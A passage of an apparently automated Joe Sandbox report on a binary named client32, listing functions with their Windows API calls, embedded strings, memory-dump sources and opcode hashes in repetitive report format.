                                                                                                                                                    • Opcode Fuzzy Hash: b6d19f504f75df2a93f1157cb60ab9b52a693478c141313c6b39b5393ddf6f55
                                                                                                                                                    • Instruction Fuzzy Hash: 74414B74A006099FDB14CF98C885EAABBF5FF48704F108569EA55AB344DB70A800CFA4
                                                                                                                                                    Function 11049690 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 106COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _malloc.LIBCMT ref: 1104971C
                                                                                                                                                    • _free.LIBCMT ref: 11049779
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    • idata->pSmartcardDevice == theSmartcardDevice, xrefs: 1104970D
                                                                                                                                                    • ReleaseSmartcardDevice called, xrefs: 110496BD
                                                                                                                                                    • CLTCONN.CPP, xrefs: 11049708
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorExitLastMessageProcess_free_mallocwsprintf
                                                                                                                                                    • String ID: CLTCONN.CPP$ReleaseSmartcardDevice called$idata->pSmartcardDevice == theSmartcardDevice
                                                                                                                                                    • API String ID: 3300666597-3188990991
                                                                                                                                                    • Opcode ID: bbd08ce13b15e0d7af9443266ff705f80d5dbbc8ca5254b04d83a5beabc5d6aa
                                                                                                                                                    • Instruction ID: e35be207329a9a02e71ffc0183289b31f5ea9fbf546850573bb4cc18e029b419
                                                                                                                                                    • Opcode Fuzzy Hash: bbd08ce13b15e0d7af9443266ff705f80d5dbbc8ca5254b04d83a5beabc5d6aa
                                                                                                                                                    • Instruction Fuzzy Hash: D041AEB5A01611AFD704CF98D880EAAFBE4FB48328F6142BDE52997350E730A940CB95
                                                                                                                                                    Function 110BD470 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetMenu.USER32(?), ref: 110BD4A4
                                                                                                                                                    • GetSubMenu.USER32(00000000,00000002), ref: 110BD4E5
                                                                                                                                                    • DrawMenuBar.USER32(?), ref: 110BD50D
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    • m_hWnd, xrefs: 110BD493
                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110BD48E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Menu$DrawErrorExitLastMessageProcesswsprintf
                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                    • API String ID: 381722633-2830328467
                                                                                                                                                    • Opcode ID: 0cf4c9e9231e7294a34ea0469e29db66948a84948ca199a1ba082523d671b7b5
                                                                                                                                                    • Instruction ID: 2ed85e2a360b3d02c99ae53d45e4f65cdbccb9b7267b746ab424cefae630bdcb
                                                                                                                                                    • Opcode Fuzzy Hash: 0cf4c9e9231e7294a34ea0469e29db66948a84948ca199a1ba082523d671b7b5
                                                                                                                                                    • Instruction Fuzzy Hash: 9B1151BAE00219AFCB04DFA5C894CAFF7B9BF49308B00457EE11697254DB74AD05CB94
                                                                                                                                                    Function 1102D750 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 51COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetVersion.KERNEL32(?,1113A2AB,00000001,00000001,Audio,HookDirectSound,00000000,00000000), ref: 1102D75C
                                                                                                                                                    • InterlockedIncrement.KERNEL32(111EE418), ref: 1102D799
                                                                                                                                                    • InterlockedDecrement.KERNEL32(111EE418), ref: 1102D7C0
                                                                                                                                                    Strings
                                                                                                                                                    • EnableAudioHook(%d, %d), gCount=%d, xrefs: 1102D77F
                                                                                                                                                    • SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Enum, xrefs: 1102D7A6, 1102D7CC
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Interlocked$DecrementIncrementVersion
                                                                                                                                                    • String ID: EnableAudioHook(%d, %d), gCount=%d$SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Enum
                                                                                                                                                    • API String ID: 1284810544-229394064
                                                                                                                                                    • Opcode ID: fe3dc48e698ffd4a8d7334cc8b8c209b51da527230acf53cf6ffc60aeaae577d
                                                                                                                                                    • Instruction ID: 926408d456050aac1ce0bfa7cc5ec849c80561d93592d3bffa921dc6a50aec96
                                                                                                                                                    • Opcode Fuzzy Hash: fe3dc48e698ffd4a8d7334cc8b8c209b51da527230acf53cf6ffc60aeaae577d
                                                                                                                                                    • Instruction Fuzzy Hash: 8801DB3AE425A956E70299D56C84F9DB7E9BF8162DFC00071FD2DD2A04F725A84043F1
                                                                                                                                                    Function 11093410 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44registrywindowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetClassInfoA.USER32(1109350C,NSMClassList,?), ref: 11093424
                                                                                                                                                    • LoadIconA.USER32(1109350C,00002716), ref: 11093456
                                                                                                                                                    • LoadCursorA.USER32(00000000,00007F00), ref: 11093465
                                                                                                                                                    • RegisterClassA.USER32(?), ref: 11093483
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClassLoad$CursorIconInfoRegister
                                                                                                                                                    • String ID: NSMClassList
                                                                                                                                                    • API String ID: 2883182437-2474587545
                                                                                                                                                    • Opcode ID: ed1d21c8b0e5febffb489e055e1c54f1fef417e553f3d38ad2266ee313231f99
                                                                                                                                                    • Instruction ID: fe778f9fdd97d031227fa6c3481e124fd7af1bb38caa6574b8637058aa02c9a3
                                                                                                                                                    • Opcode Fuzzy Hash: ed1d21c8b0e5febffb489e055e1c54f1fef417e553f3d38ad2266ee313231f99
                                                                                                                                                    • Instruction Fuzzy Hash: D2015AB1D4522DABCB00CF9A99489EEFBFCEF98315F00415BE424F3240D7B556518BA5
                                                                                                                                                    Function 11145660 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 44COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadStringA.USER32(00000000,00000000,?,11112FE6), ref: 11145678
                                                                                                                                                    • wsprintfA.USER32 ref: 1114568E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LoadStringwsprintf
                                                                                                                                                    • String ID: #%d$..\ctl32\util.cpp$i < cchBuf
                                                                                                                                                    • API String ID: 104907563-3240211118
                                                                                                                                                    • Opcode ID: 188e66dcb4f495cccd276ddbe85c9828130f8f7e32c029e7730bc87656a10fbf
                                                                                                                                                    • Instruction ID: 8140d2e7eee7513769b3ba4dad54de8c0dbe44583bb89c450ccda0d540df1705
                                                                                                                                                    • Opcode Fuzzy Hash: 188e66dcb4f495cccd276ddbe85c9828130f8f7e32c029e7730bc87656a10fbf
                                                                                                                                                    • Instruction Fuzzy Hash: 09F0F6BAA002267BDA008A99EC85DDFFB5CDF4469C7404025F908C7600EA30E800C7A9
                                                                                                                                                    Function 11145450 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,11037F05), ref: 11145463
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 11145475
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,11037F05), ref: 11145485
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                    • String ID: GetUserDefaultUILanguage$kernel32.dll
                                                                                                                                                    • API String ID: 145871493-545709139
                                                                                                                                                    • Opcode ID: d9714682fd572e4dd61365fd2dfa7814b888b2e8bab1e0a3a5dbf5644fcdd9a2
                                                                                                                                                    • Instruction ID: e6235b5ae6f1dfca5c3043155b5dfa22c054f7606e96d7ad1ec578fde494cc77
                                                                                                                                                    • Opcode Fuzzy Hash: d9714682fd572e4dd61365fd2dfa7814b888b2e8bab1e0a3a5dbf5644fcdd9a2
                                                                                                                                                    • Instruction Fuzzy Hash: A1F0A7317021744FE3568AB69F84AAEFAD5EB81B7AB190135E430CAA98E73488408765
                                                                                                                                                    Function 110ED0D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • IsWindow.USER32(00000000), ref: 110ED0D9
                                                                                                                                                    • SendMessageA.USER32(00000000,0000045B,11020C43,00000000), ref: 110ED10D
                                                                                                                                                    • SendMessageA.USER32(00000000,00000445,00000000,04000000), ref: 110ED11C
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$Send$ErrorExitLastProcessWindowwsprintf
                                                                                                                                                    • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)
                                                                                                                                                    • API String ID: 2446111109-1196874063
                                                                                                                                                    • Opcode ID: 93f24dbc4e032974f58e80ca0bca6baec86c89681a163379e751775f02966cce
                                                                                                                                                    • Instruction ID: de22b858d700e942c4608c09a96d83abbd875fbcce216c0436bbd94e05821714
                                                                                                                                                    • Opcode Fuzzy Hash: 93f24dbc4e032974f58e80ca0bca6baec86c89681a163379e751775f02966cce
                                                                                                                                                    • Instruction Fuzzy Hash: 75E0D82978027837D52176926C0AFDF7B5CCB85A55F058021FB15BB0C1D560730146ED
                                                                                                                                                    Function 11017420 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • FindWindowA.USER32(IPTip_Main_Window,00000000), ref: 11017428
                                                                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 11017437
                                                                                                                                                    • PostMessageA.USER32(00000000,00000112,0000F060,00000000), ref: 11017458
                                                                                                                                                    • SendMessageA.USER32(00000000,00000112,0000F060,00000000), ref: 1101746B
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageWindow$FindLongPostSend
                                                                                                                                                    • String ID: IPTip_Main_Window
                                                                                                                                                    • API String ID: 3445528842-293399287
                                                                                                                                                    • Opcode ID: 00a8c747fde22ab102a93d32433fce56b25fb468ef9c10acfd2dcd85990a41f8
                                                                                                                                                    • Instruction ID: 34ac11834c9c2e389a15be58e88483fc622eca852c0d3e073bf1a838df65f62f
                                                                                                                                                    • Opcode Fuzzy Hash: 00a8c747fde22ab102a93d32433fce56b25fb468ef9c10acfd2dcd85990a41f8
                                                                                                                                                    • Instruction Fuzzy Hash: A6E0DF38AC1B7973F23916204E5AFCA79458B00B20F100150FB32BC9C98B9894009698
                                                                                                                                                    Function 6CA9AC30 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __strdup.LIBCMT ref: 6CA9AC64
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?), ref: 6CA9ACA1
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 6CA9ACB7
                                                                                                                                                    • _malloc.LIBCMT ref: 6CA9ACC6
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 6CA9ACE0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharMultiWide$__strdup_malloc
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2291067320-0
